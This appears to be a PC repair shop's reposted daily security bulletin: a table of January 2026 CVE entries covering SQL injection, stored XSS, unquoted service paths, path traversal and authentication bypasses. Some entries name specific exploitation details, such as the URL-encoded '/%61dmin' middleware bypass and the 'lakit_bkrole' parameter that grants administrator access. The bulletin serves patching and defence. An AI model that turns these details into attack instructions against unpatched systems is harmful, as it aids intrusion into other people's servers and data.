PC Repair Service Centre
Computer Repair Center would post the daily security alert below. Please check if your server, web server, email server and PC have below Vulnerabilities and fix it as soon as possible. You may also contact our IT expertises at 9145-7188.
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Agatasoft--AgataSoft PingMaster Pro | AgataSoft PingMaster Pro 2.1 contains a denial of service vulnerability in the Trace Route feature that allows attackers to crash the application by overflowing the host name input field. Attackers can generate a 10,000-character buffer and paste it into the host name field to trigger an application crash and potential system instability. | 2026-01-23 | 7.5 | CVE-2021-47893 | ExploitDB-49567 Vendor Homepage VulnCheck Advisory: AgataSoft PingMaster Pro 2.1 - Denial of Service |
| Aida Computer Information Technology Inc.--Hotel Guest Hotspot | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aida Computer Information Technology Inc. Hotel Guest Hotspot allows SQL Injection. This issue affects Hotel Guest Hotspot: through 22012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-22 | 8 | CVE-2025-4764 | https://www.usom.gov.tr/bildirim/tr-26-0001 |
| Altium--AES | AES contains a SQL injection vulnerability due to an inactive configuration that prevents the latest SQL parsing logic from being applied. When this configuration is not enabled, crafted input may be improperly handled, allowing attackers to inject and execute arbitrary SQL queries. | 2026-01-22 | 8.6 | CVE-2025-27378 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--AES | HTML injection in Project Release in Altium Enterprise Server (AES) 7.0.3 on all platforms allows an authenticated attacker to execute arbitrary JavaScript in the victim's browser via crafted HTML content. | 2026-01-22 | 7.6 | CVE-2025-27380 | https://www.altium.com/platform/security-compliance/security-advisories |
| Altium--Altium 365 | Altium 365 workspace endpoints were configured with an overly permissive Cross-Origin Resource Sharing (CORS) policy that allowed credentialed cross-origin requests from other Altium-controlled subdomains, including forum.live.altium.com. As a result, JavaScript executing on those origins could access authenticated workspace APIs in the context of a logged-in user. When chained with vulnerabilities in those external applications, this misconfiguration enables unauthorized access to workspace data, administrative actions, and bypass of IP allowlisting controls, including in GovCloud environments. | 2026-01-19 | 9 | CVE-2026-1181 | https://www.altium.com/platform/security-compliance/security-advisories |
| AMASTAR Technology--MeetingHub | MeetingHub developed by HAMASTAR Technology has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-01-22 | 9.8 | CVE-2026-1331 | https://www.twcert.org.tw/tw/cp-132-10650-a5ee9-1.html https://www.twcert.org.tw/en/cp-139-10651-ff09c-2.html |
| appsmithorg--appsmith | Appsmith is a platform to build admin panels, internal tools, and dashboards. In versions 1.94 and below, publicly accessible apps allow unauthenticated users to execute unpublished (edit-mode) actions by sending viewMode=false (or omitting it) to POST /api/v1/actions/execute. This bypasses the expected publish boundary where public viewers should only execute published actions, not edit-mode versions. An attack can result in sensitive data exposure, execution of edit‑mode queries and APIs, development data access, and the ability to trigger side effect behavior. This issue does not have a released fix at the time of publication. | 2026-01-22 | 9.4 | CVE-2026-24042 | https://github.com/appsmithorg/appsmith/security/advisories/GHSA-j9qq-4fj9-9883 |
| Autodesk--Fusion | A maliciously crafted HTML payload in a design name, when displayed during the delete confirmation dialog and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process. | 2026-01-22 | 7.1 | CVE-2026-0533 | https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0001 |
| Autodesk--Fusion | A maliciously crafted HTML payload, stored in a part's attribute and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process. | 2026-01-22 | 7.1 | CVE-2026-0534 | https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0001 |
| Autodesk--Fusion | A maliciously crafted HTML payload, stored in a component's description and clicked by a user, can trigger a Stored Cross-site Scripting (XSS) vulnerability in the Autodesk Fusion desktop application. A malicious actor may leverage this vulnerability to read local files or execute arbitrary code in the context of the current process. | 2026-01-22 | 7.1 | CVE-2026-0535 | https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.exe https://dl.appstreaming.autodesk.com/production/installers/Fusion%20Client%20Downloader.dmg https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0001 |
| Autonomy--OpenPLC | OpenPLC v3 contains an authenticated remote code execution vulnerability that allows attackers with valid credentials to inject malicious code through the hardware configuration interface. Attackers can upload a custom hardware layer with embedded reverse shell code that establishes a network connection to a specified IP and port, enabling remote command execution. | 2026-01-21 | 8.8 | CVE-2021-47770 | ExploitDB-49803 OpenPLC Project Official Homepage OpenPLC v3 GitHub Repository VulnCheck Advisory: OpenPLC 3 - Remote Code Execution |
| B&R Industrial Automation GmbH--B&R Automation Studio | An Improper Certificate Validation vulnerability in the OPC-UA client and ANSL over TLS client used in Automation Studio versions before 6.5 could allow an unauthenticated attacker on the network to position themselves to intercept and interfere with data exchanges. | 2026-01-19 | 7.4 | CVE-2025-11043 | https://www.br-automation.com/fileadmin/SA25P004-4f45197f.pdf |
| backstage--backstage | Backstage is an open framework for building developer portals. Multiple Scaffolder actions and archive extraction utilities were vulnerable to symlink-based path traversal attacks. An attacker with access to create and execute Scaffolder templates could exploit symlinks to read arbitrary files via the `debug:log` action by creating a symlink pointing to sensitive files (e.g., `/etc/passwd`, configuration files, secrets); delete arbitrary files via the `fs:delete` action by creating symlinks pointing outside the workspace, and write files outside the workspace via archive extraction (tar/zip) containing malicious symlinks. This affects any Backstage deployment where users can create or execute Scaffolder templates. This vulnerability is fixed in `@backstage/backend-defaults` versions 0.12.2, 0.13.2, 0.14.1, and 0.15.0; `@backstage/plugin-scaffolder-backend` versions 2.2.2, 3.0.2, and 3.1.1; and `@backstage/plugin-scaffolder-node` versions 0.11.2 and 0.12.3. Users should upgrade to these versions or later. Some workarounds are available. Follow the recommendation in the Backstage Threat Model to limit access to creating and updating templates, restrict who can create and execute Scaffolder templates using the permissions framework, audit existing templates for symlink usage, and/or run Backstage in a containerized environment with limited filesystem access. | 2026-01-21 | 7.1 | CVE-2026-24046 | https://github.com/backstage/backstage/security/advisories/GHSA-rq6q-wr2q-7pgp https://github.com/backstage/backstage/commit/c641c147ab371a9a8a2f5f67fdb7cb9c97ef345d |
| baptisteArno--typebot.io | Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking "Run", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue. | 2026-01-22 | 7.4 | CVE-2025-65098 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47 |
| Birebirsoft Software and Technology Solutions--Sufirmam | Authentication Bypass by Primary Weakness, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Authentication Bypass, Password Recovery Exploitation. This issue affects Sufirmam: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-23 | 10 | CVE-2025-4320 | https://www.usom.gov.tr/bildirim/tr-26-0005 |
| Birebirsoft Software and Technology Solutions--Sufirmam | Improper Restriction of Excessive Authentication Attempts, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Brute Force, Password Recovery Exploitation. This issue affects Sufirmam: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-23 | 9.4 | CVE-2025-4319 | https://www.usom.gov.tr/bildirim/tr-26-0005 |
| Brother Industries, Ltd.--BRAdmin Professional | Brother BRAdmin Professional 3.75 contains an unquoted service path vulnerability in the BRA_Scheduler service that allows local users to potentially execute arbitrary code. Attackers can place a malicious executable named 'BRAdmin' in the C:\Program Files (x86)\Brother\ directory to gain local system privileges. | 2026-01-21 | 7.8 | CVE-2021-47869 | ExploitDB-49671 Brother Global Homepage Brother Software Download Page Vulnerability Technical Details VulnCheck Advisory: BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path |
| BROWAN COMMUNICATIONS--PrismX MX100 AP controller | PrismX MX100 AP controller developed by BROWAN COMMUNICATIONS has a Use of Hard-coded Credentials vulnerability, allowing unauthenticated remote attackers to log in to the database using hardcoded database credentials stored in the firmware. | 2026-01-20 | 9.8 | CVE-2026-1221 | https://www.twcert.org.tw/tw/cp-132-10642-3b808-1.html https://www.twcert.org.tw/en/cp-139-10643-2f8d7-2.html |
| BROWAN COMMUNICATIONS--PrismX MX100 AP controller | PrismX MX100 AP controller developed by BROWAN COMMUNICATIONS has an Arbitrary File Upload vulnerability, allowing privileged remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server. | 2026-01-20 | 7.2 | CVE-2026-1222 | https://www.twcert.org.tw/tw/cp-132-10642-3b808-1.html https://www.twcert.org.tw/en/cp-139-10643-2f8d7-2.html |
| buddypress--BuddyPress | The The BuddyPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 14.3.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2026-01-23 | 7.3 | CVE-2024-11976 | https://www.wordfence.com/threat-intel/vulnerabilities/id/34c627c1-7838-468e-acb7-eb84ad1b4949?source=cve https://plugins.trac.wordpress.org/browser/buddypress/tags/14.3.1/bp-templates/bp-nouveau/includes/messages/ajax.php#L232 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3259392%40buddypress%2Ftrunk&old=3199645%40buddypress%2Ftrunk&sfp_email=&sfph_mail= |
| chattermate--chattermate.chat | ChatterMate is a no-code AI chatbot agent framework. In versions 1.0.8 and below, the chatbot accepts and executes malicious HTML/JavaScript payloads when supplied as chat input. Specifically, an <iframe> payload containing a javascript: URI can be processed and executed in the browser context. This allows access to sensitive client-side data such as localStorage tokens and cookies, resulting in client-side injection. This issue has been fixed in version 1.0.9. | 2026-01-24 | 9.3 | CVE-2026-24399 | https://github.com/chattermate/chattermate.chat/security/advisories/GHSA-72p3-w95w-q3j4 https://github.com/chattermate/chattermate.chat/commit/ff3398031abb97ae28546eaf993fed3619eaffdd https://github.com/chattermate/chattermate.chat/releases/tag/v1.0.9 |
| choijun--LA-Studio Element Kit for Elementor | The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Administrative User Creation in all versions up to, and including, 1.5.6.3. This is due to the 'ajax_register_handle' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'lakit_bkrole' parameter during registration and gain administrator access to the site. | 2026-01-22 | 9.8 | CVE-2026-0920 | https://www.wordfence.com/threat-intel/vulnerabilities/id/65ebc744-6cc2-47ce-b225-81820e49d59c?source=cve https://plugins.trac.wordpress.org/browser/lastudio-element-kit/tags/1.5.6.3/includes/integrations/override.php#L301 https://plugins.trac.wordpress.org/changeset/3439121/lastudio-element-kit |
| Cisco--Cisco Unified Communications Manager | A vulnerability in Cisco Unified Communications Manager (Unified CM), Cisco Unified Communications Manager Session Management Edition (Unified CM SME), Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P), Cisco Unity Connection, and Cisco Webex Calling Dedicated Instance could allow an unauthenticated, remote attacker to execute arbitrary commands on the underlying operating system of an affected device. This vulnerability is due to improper validation of user-supplied input in HTTP requests. An attacker could exploit this vulnerability by sending a sequence of crafted HTTP requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to obtain user-level access to the underlying operating system and then elevate privileges to root. Note: Cisco has assigned this security advisory a Security Impact Rating (SIR) of Critical rather than High as the score indicates. The reason is that exploitation of this vulnerability could result in an attacker elevating privileges to root. | 2026-01-21 | 8.2 | CVE-2026-20045 | cisco-sa-voice-rce-mORhqY4b |
| CRMEB--CRMEB | A security flaw has been discovered in CRMEB up to 5.6.3. The affected element is the function appleLogin of the file crmeb/app/api/controller/v1/LoginController.php. Performing a manipulation of the argument openId results in improper authentication. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 7.3 | CVE-2026-1202 | VDB-341788 | CRMEB LoginController.php appleLogin improper authentication VDB-341788 | CTI Indicators (IOB, IOC, IOA) Submit #734711 | Zhongbang CRMEB v5.6.3 Improper Authentication https://github.com/foeCat/CVE/blob/main/CRMEB/apple_login_auth_bypass.md |
| Data Device Corporation--dataSIMS Avionics ARINC | dataSIMS Avionics ARINC 664-1 version 4.5.3 contains a local buffer overflow vulnerability that allows attackers to overwrite memory by manipulating the milstd1553result.txt file. Attackers can craft a malicious file with carefully constructed payload and alignment sections to potentially execute arbitrary code on the Windows system. | 2026-01-23 | 8.4 | CVE-2021-47881 | ExploitDB-49577 Vendor Homepage Software Product Page VulnCheck Advisory: dataSIMS Avionics ARINC 664-1 - Local Buffer Overflow |
| Deepinstinct--Deep Instinct Windows Agent | Deep Instinct Windows Agent 1.2.24.0 contains an unquoted service path vulnerability in the DeepNetworkService that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\Program Files\HP Sure Sense\DeepNetworkService.exe to inject malicious code that would execute with LocalSystem permissions during service startup. | 2026-01-25 | 7.8 | CVE-2020-36934 | ExploitDB-49020 Deep Instinct Official Homepage HP Collaboration Announcement VulnCheck Advisory: Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path |
| Dell--ObjectScale | Dell ECS, versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.2.0.0, contains an Use of Default Credentials vulnerability in the OS. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges. | 2026-01-23 | 8.8 | CVE-2026-22273 | https://www.dell.com/support/kbdoc/en-us/000415880/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities |
| Dell--ObjectScale | Dell ECS, versions 3.8.1.0 through 3.8.1.7, and Dell ObjectScale versions prior to 4.2.0.0, contains a Cleartext Transmission of Sensitive Information vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information exposure. | 2026-01-23 | 7.5 | CVE-2026-22271 | https://www.dell.com/support/kbdoc/en-us/000415880/dsa-2026-047-security-update-for-dell-ecs-and-objectscale-multiple-vulnerabilities |
| Dell--PowerScale OneFS | Dell PowerScale OneFS versions prior to 9.13.0.0 contains an improper restriction of excessive authentication attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access. | 2026-01-22 | 8.1 | CVE-2026-22278 | https://www.dell.com/support/kbdoc/en-us/000415586/dsa-2026-049-security-update-for-dell-powerscale-onefs-multiple-vulnerabilities |
| Dell--Unisphere for PowerMax | Dell Unisphere for PowerMax, version(s) 10.2.0.x, contain(s) an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Command execution. | 2026-01-22 | 8.8 | CVE-2025-36588 | https://www.dell.com/support/kbdoc/en-us/000402262/dsa-2025-425-dell-powermaxos-dell-powermax-eem-dell-unisphere-for-powermax-dell-unisphere-for-powermax-virtual-appliance-dell-unisphere-360-dell-solutions-enabler-virtual-appliance-security-update-for-multiple-vulnerabilities |
| docling-project--docling-core | Docling Core (or docling-core) is a library that defines core data types and transformations in the document processing application Docling. A PyYAML-related Remote Code Execution (RCE) vulnerability, namely CVE-2020-14343, is exposed in docling-core starting in version 2.21.0 and prior to version 2.48.4, specifically only if the application uses pyyaml prior to version 5.4 and invokes `docling_core.types.doc.DoclingDocument.load_from_yaml()` passing it untrusted YAML data. The vulnerability has been patched in docling-core version 2.48.4. The fix mitigates the issue by switching `PyYAML` deserialization from `yaml.FullLoader` to `yaml.SafeLoader`, ensuring that untrusted data cannot trigger code execution. Users who cannot immediately upgrade docling-core can alternatively ensure that the installed version of PyYAML is 5.4 or greater. | 2026-01-22 | 8.1 | CVE-2026-24009 | https://github.com/docling-project/docling-core/security/advisories/GHSA-vqxf-v2gg-x3hc https://github.com/docling-project/docling-core/issues/482 https://github.com/docling-project/docling-core/commit/3e8d628eeeae50f0f8f239c8c7fea773d065d80c https://github.com/advisories/GHSA-8q59-q68h-6hv4 https://github.com/docling-project/docling-core/releases/tag/v2.48.4 |
| dokaninc--Dokan: AI Powered WooCommerce Multivendor Marketplace Solution Build Your Own Amazon, eBay, Etsy | The Dokan: AI Powered WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 4.2.4 via the `/wp-json/dokan/v1/settings` REST API endpoint due to missing validation on a user-controlled key. This makes it possible for authenticated attackers, with customer-level permissions and above, to read or modify other vendors' store settings including sensitive payment information (PayPal email, bank account details, routing numbers, IBAN, SWIFT codes), phone numbers, and addresses, and change PayPal email addresses to attacker-controlled addresses, enabling financial theft when the marketplace processes payouts. | 2026-01-20 | 8.1 | CVE-2025-14977 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4ab9d7e9-9a81-48f8-bc37-ad6de43a566f?source=cve https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreSettingController.php#L131 https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreSettingController.php#L152 https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreSettingController.php#L109 https://plugins.trac.wordpress.org/browser/dokan-lite/trunk/includes/REST/StoreSettingController.php#L85 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3432750%40dokan-lite%2Ftrunk&old=3427612%40dokan-lite%2Ftrunk&sfp_email=&sfph_mail=#file7 |
| embeDD GmbH--DD-WRT | DD-WRT version 45723 contains a buffer overflow vulnerability in the UPNP network discovery service that allows remote attackers to potentially execute arbitrary code. Attackers can send crafted M-SEARCH packets with oversized UUID payloads to trigger buffer overflow conditions on the target device. | 2026-01-21 | 9.8 | CVE-2021-47854 | ExploitDB-49730 DD-WRT Official Vendor Homepage DD-WRT Software Download Repository SSD Security Advisory for DD-WRT UPNP Buffer Overflow VulnCheck Advisory: DD-WRT 45723 - UPNP Buffer Overflow |
| Epiphany--Epiphany | A flaw was found in Epiphany, a tool that allows websites to open external URL handler applications with minimal user interaction. This design can be misused to exploit vulnerabilities within those handlers, making them appear remotely exploitable. The browser fails to properly warn or gate this action, resulting in potential code execution on the client device via trusted UI behavior. | 2026-01-23 | 8 | CVE-2025-3839 | https://access.redhat.com/security/cve/CVE-2025-3839 RHBZ#2361430 |
| Epson America, Inc.--Epson USB Display | Epson USB Display 1.6.0.0 contains an unquoted service path vulnerability in the EMP_UDSA service running with LocalSystem privileges. Attackers can exploit the unquoted path by placing malicious executables in intermediate directories to gain elevated system access. | 2026-01-23 | 7.8 | CVE-2021-47898 | ExploitDB-49548 Epson Official Homepage VulnCheck Advisory: Epson USB Display 1.6.0.0 Unquoted Service Path Vulnerability |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.10.0, an integer overflow occurring in `SdpPacket::parse_header()` allows the current buffer length to be set to 7 after a complete header of size 8 has been read. The remaining length to read is computed using the current length subtracted by the header length which results in a negative value. This value is then interpreted as `SIZE_MAX` (or slightly less) because the expected type of the argument is `size_t`. Depending on whether the server is plain TCP or TLS, this leads to either an infinite loop or a stack buffer overflow. Version 2025.10.0 fixes the issue. | 2026-01-21 | 8.4 | CVE-2025-68137 | https://github.com/EVerest/everest-core/security/advisories/GHSA-7qq4-q9r8-wc7w |
| EVerest--everest-core | EVerest is an EV charging software stack. In versions 2025.9.0 and below, an attacker can exhaust the operating system's memory and cause the module to terminate by initiating an unlimited number of TCP connections that never proceed to ISO 15118-2 communication. This is possible because a new thread is started for each incoming plain TCP or TLS socket connection before any verification occurs, and the verification performed is too permissive. The EVerest processes and all its modules shut down, affecting all EVSE functionality. This issue is fixed in version 2025.10.0. | 2026-01-21 | 7.4 | CVE-2025-68133 | https://github.com/EVerest/everest-core/security/advisories/GHSA-mv3w-pp85-5h7c https://github.com/EVerest/everest-core/commit/8127b8c54b296c4dd01b356ac26763f81f76a8fd https://github.com/EVerest/everest-core/commit/de504f0c11069010d26767b0952739e9a400cef3 |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.10.0, the use of the `assert` function to handle errors frequently causes the module to crash. This is particularly critical because the manager shuts down all other modules and exits when any one of them terminates, leading to a denial of service. In a context where a manager handles multiple EVSE, this would also impact other users. Version 2025.10.0 fixes the issue. | 2026-01-21 | 7.4 | CVE-2025-68134 | https://github.com/EVerest/everest-core/security/advisories/GHSA-cxc5-rrj5-8pf3 |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.10.0, once the module receives a SDP request, it creates a whole new set of objects like `Session`, `IConnection` which open new TCP socket for the ISO15118-20 communications and registers callbacks for the created file descriptor, without closing and destroying the previous ones. Previous `Session` is not saved and the usage of an `unique_ptr` is lost, destroying connection data. Latter, if the used socket and therefore file descriptor is not the last one, it will lead to a null pointer dereference. Version 2025.10.0 fixes the issue. | 2026-01-21 | 7.4 | CVE-2025-68136 | https://github.com/EVerest/everest-core/security/advisories/GHSA-4h8h-x5cp-g22r |
| EVerest--everest-core | EVerest is an EV charging software stack. Prior to version 2025.10.0, during the deserialization of a `DC_ChargeLoopRes` message that includes Receipt as well as TaxCosts, the vector `<DetailedTax>tax_costs` in the target `Receipt` structure is accessed out of bounds. This occurs in the method `template <> void convert(const struct iso20_dc_DetailedTaxType& in, datatypes::DetailedTax& out)` which leads to a null pointer dereference and causes the module to terminate. The EVerest processes and all its modules shut down, affecting all EVSE. Version 2025.10.0 fixes the issue. | 2026-01-21 | 7.4 | CVE-2025-68141 | https://github.com/EVerest/everest-core/security/advisories/GHSA-ph4w-r9q8-vm9h |
| EVMAPA--EVMAPA | This vulnerability occurs when a WebSocket endpoint does not enforce proper authentication mechanisms, allowing unauthorized users to establish connections. As a result, attackers can exploit this weakness to gain unauthorized access to sensitive data or perform unauthorized actions. Given that no authentication is required, this can lead to privilege escalation and potentially compromise the security of the entire system. | 2026-01-22 | 9.4 | CVE-2025-54816 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-08 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-08.json |
| EVMAPA--EVMAPA | This vulnerability arises because there are no limitations on the number of authentication attempts a user can make. An attacker can exploit this weakness by continuously sending authentication requests, leading to a denial-of-service (DoS) condition. This can overwhelm the authentication system, rendering it unavailable to legitimate users and potentially causing service disruption. This can also allow attackers to conduct brute-force attacks to gain unauthorized access. | 2026-01-22 | 7.5 | CVE-2025-53968 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-08 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-08.json |
| EVMAPA--EVMAPA | This vulnerability occurs when the system permits multiple simultaneous connections to the backend using the same charging station ID. This can result in unauthorized access, data inconsistency, or potential manipulation of charging sessions. The lack of proper session management and expiration control allows attackers to exploit this weakness by reusing valid charging station IDs to establish multiple sessions concurrently. | 2026-01-22 | 7.3 | CVE-2025-55705 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-08 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-022-08.json |
| EXERT Computer Technologies Software Ltd. Co.--Education Management System | Authorization Bypass Through User-Controlled Key vulnerability in EXERT Computer Technologies Software Ltd. Co. Education Management System allows Parameter Injection. This issue affects Education Management System: through 23.09.2025. | 2026-01-22 | 7.5 | CVE-2025-10024 | https://www.usom.gov.tr/bildirim/tr-26-0002 |
| fastify--fastify-express | The @fastify/express plugin adds full Express compatibility to Fastify. A security vulnerability exists in @fastify/express prior to version 4.0.3 where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., `/%61dmin` instead of `/admin`). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints. The vulnerability is caused by how @fastify/express matches requests against registered middleware paths. This vulnerability is similar to, but differs from, CVE-2026-22031 because this is a different npm module with its own code. Version 4.0.3 of @fastify/express contains a patch fort the issue. | 2026-01-19 | 8.4 | CVE-2026-22037 | https://github.com/fastify/fastify-express/security/advisories/GHSA-g6q3-96cp-5r5m https://github.com/fastify/fastify-express/commit/dc02a3fe1387f945143f22597baa42557d549a40 |
| fastify--middie | @fastify/middie is the plugin that adds middleware support on steroids to Fastify. A security vulnerability exists in @fastify/middie prior to version 9.1.0 where middleware registered with a specific path prefix can be bypassed using URL-encoded characters (e.g., `/%61dmin` instead of `/admin`). While the middleware engine fails to match the encoded path and skips execution, the underlying Fastify router correctly decodes the path and matches the route handler, allowing attackers to access protected endpoints without the middleware constraints. Version 9.1.0 fixes the issue. | 2026-01-19 | 8.4 | CVE-2026-22031 | https://github.com/fastify/middie/security/advisories/GHSA-cxrg-g7r8-w69p https://github.com/fastify/middie/pull/245 https://github.com/fastify/middie/commit/d44cd56eb724490babf7b452fdbbdd37ea2effba https://github.com/fastify/middie/releases/tag/v9.1.0 |
| FOGProject--fogproject | FOG is a free open-source cloning/imaging/rescue suite/inventory management system. Versions 1.5.10.1754 and below contain an unauthenticated SSRF vulnerability in getversion.php which can be triggered by providing a user-controlled url parameter. It can be used to fetch both internal websites and files on the machine running FOG. This appears to be reachable without an authenticated web session when the request includes newService=1. The issue does not have a fixed release version at the time of publication. | 2026-01-23 | 7.5 | CVE-2026-24138 | https://github.com/FOGProject/fogproject/security/advisories/GHSA-79xw-c2qx-g7xj |
| franklioxygen--MyTube | MyTube is a self-hosted downloader and player for several video websites. A vulnerability present in version 1.7.65 and poetntially earlier versions allows unauthenticated users to bypass the mandatory authentication check in the roleBasedAuthMiddleware. By simply not providing an authentication cookie (making req.user undefined), a request is incorrectly passed through to downstream handlers. All users running MyTube with loginEnabled: true are impacted. This flaw allows an attacker to access and modify application settings via /api/settings, change administrative and visitor passwords, and access other protected routes that rely on this specific middleware. The problem is patched in v1.7.66. MyTube maintainers recommend all users upgrade to at least version v1.7.64 immediately to secure their instances. The fix ensures that the middleware explicitly blocks requests if a user is not authenticated, rather than defaulting to next(). Those who cannot upgrade immediately can mitigate risk by restricting network access by usi a firewall or reverse proxy (like Nginx) to restrict access to the /api/ endpoints to trusted IP addresses only or, if they are comfortable editing the source code, manually patch by locating roleBasedAuthMiddleware and ensuring that the logic defaults to an error (401 Unauthorized) when req.user is undefined, instead of calling next(). | 2026-01-19 | 9.8 | CVE-2026-23837 | https://github.com/franklioxygen/MyTube/security/advisories/GHSA-cmvj-g69f-8664 https://github.com/franklioxygen/MyTube/commit/f85ae9b0d6e4a6480c6af5b675a99069d08d496e |
| FreeLAN--FreeLAN | FreeLAN 2.2 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with elevated LocalSystem privileges during service startup. | 2026-01-21 | 7.8 | CVE-2021-47882 | ExploitDB-49630 FreeLAN GitHub Repository VulnCheck Advisory: FreeLAN 2.2 - 'FreeLAN Service' Unquoted Service Path |
| frustratedProton--http-server | C++ HTTP Server is an HTTP/1.1 server built to handle client connections and serve HTTP requests. Versions 1.0 and below are vulnerable to Path Traversal via the RequestHandler::handleRequest method. This flaw allows an unauthenticated, remote attacker to read arbitrary files from the server's filesystem by crafting a malicious HTTP GET request containing ../ sequences. The application fails to sanitize the filename variable derived from the user-controlled URL path, directly concatenating it to the files_directory base path and enabling traversal outside the intended root. No patch was available at the time of publication. | 2026-01-24 | 7.5 | CVE-2026-24469 | https://github.com/frustratedProton/http-server/security/advisories/GHSA-qp54-6gfq-3gff |
| FSPro Labs--Event Log Explorer | Event Log Explorer 4.9.3 contains an unquoted service path vulnerability that allows local users to potentially execute arbitrary code with elevated system privileges. Attackers can exploit the unquoted service path by placing malicious executables in specific file system locations that will be executed with LocalSystem account privileges during service startup. | 2026-01-21 | 7.8 | CVE-2021-47861 | ExploitDB-49704 Vendor Homepage VulnCheck Advisory: Event Log Explorer 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path |
| Fyrolabs LLC.--Pingzapper | Pingzapper 2.3.1 contains an unquoted service path vulnerability in the PingzapperSvc service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Pingzapper\PZService.exe' to inject malicious executables and escalate privileges. | 2026-01-21 | 7.8 | CVE-2021-47886 | ExploitDB-49626 Vendor Homepage Software Download Page VulnCheck Advisory: Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path |
| Genexis--Platinum-4410 | Genexis Platinum-4410 P4410-V2-1.31A contains a stored cross-site scripting vulnerability in the 'start_addr' parameter of the Security Management interface. Attackers can inject malicious scripts through the start source address field that will persist and trigger for privileged users when they access the security management page. | 2026-01-21 | 7.2 | CVE-2021-47858 | ExploitDB-49709 Genexis Product Page VulnCheck Advisory: Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting |
